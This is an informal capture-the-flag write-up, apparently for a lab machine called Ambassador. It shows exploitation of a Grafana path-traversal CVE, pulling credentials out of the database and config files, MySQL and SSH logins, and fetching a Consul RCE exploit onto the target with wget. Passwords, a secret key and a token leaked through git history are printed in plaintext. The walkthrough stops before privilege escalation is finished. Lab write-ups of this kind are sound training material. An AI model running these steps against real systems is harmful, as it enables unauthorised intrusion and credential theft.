Also we should keep aside the fact that it is version 8.2.0. According to the website latest release is 9.1 so this is definitely something worth investigating
CVE-2021-4378
Let's see if this version is vulnerable to something. It is, we have a poc for CVE-2021-43798
Let's install and try it
I am going to use a virtual env python3 -m venv grafanaexploit
source grafanaexploit/bin/activate
In order for the script to work we need to edit the file /exploit-grafana-CVE-2021-43798/grafanaexploit/lib/python3.10/site-packages/prompt_toolkit/styles/from_dict.p
We have to change the import from collections import Mapping to from collections.abc import Mapping (I found this fix from this video)
We can now launch the script
I did a file domain.txt with this line in it 10.10.11.183:3000
The db file contains the user admin (to read it we can use sqlbrowser sqlitebrowser 10_10_11_183_3000/grafana.db)
Privesc
sudo -l does not give anything. Let's get linpeas. uname -a gives this Linux ambassador 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
These 2 commits about the config script are worth having a look at. We can find a way to have a look at a specific commit here. This command should help us.
Note don't waste time on trying to use git commands elsewhere that in the my-app folder ^_-
Let's see if we can find some exploits online
I tried a few but the only one that worked was this one wget https://raw.githubusercontent.com/GatoGamer1155/Hashicorp-Consul-RCE-via-API/main/exploit.py
We have to get it in our target python3 -m http.server 80 we launch our http server
wget http://10.10.14.5/exploit.py we take the exploit from our target
The etc/passwd file finds a developer user developer:x:1000:1000:developer:/home/developer:/bin/bash
The file defaults.ini contains so interesting info
We have a secret here it is the secret key that was extracted with the script SW2YcwTIb9zpOOhoPsMm
This might be worth investigating
This too
The graphana.ini has the admin password messageInABottle685427
We can login on grafana as the admin.
I can not find a place to execute command or anything...
Let's use sqlite3 to have a look at the db file, this way we will be able to use the cmd line (plus it will be more easy on our eyes :D) sqlite3 exploit-grafana-CVE-2021-43798/10_10_11_183_3000/grafana.db
We can find useful sqlite3 commands here
We find another password in the data_source table dontStandSoCloseToMe63221!
We saw that the mysql port was open with our nmap. Let's connect to it mysql -h 10.10.11.183 -u grafana -p
When having a look at the databases we have an usal database whackywidget
Let's run use whackywidget to see what it is. There is only one table users. Sounds interesting
We get another password for developer which is the user we spotted in the /etc/passwd file!
It is base64 encoded. My burp is still running so let's use the decoder. We seem to have a Sting fan on this box ^_^ anEnglishManInNewYork027468
Let's try it on ssh ssh developer@10.10.11.183. It works we are logged in as developer
Let's grab our user flag cat user.txt
We can try this git show c982db8eff6f10f8f3a7d802f79f2705e7a21b55. It leaks a token --token bb03b43b-1d81-d62b-24b5-39540ee469b5 and mentions Consul. We need to check out more about Consul
The other commit on a config file was just done to remove the token.
Here is consul's website.
It seems like a juicy tool for security "Consul uses service identities and traditional networking practices to help organizations securely connect applications running in any environment."
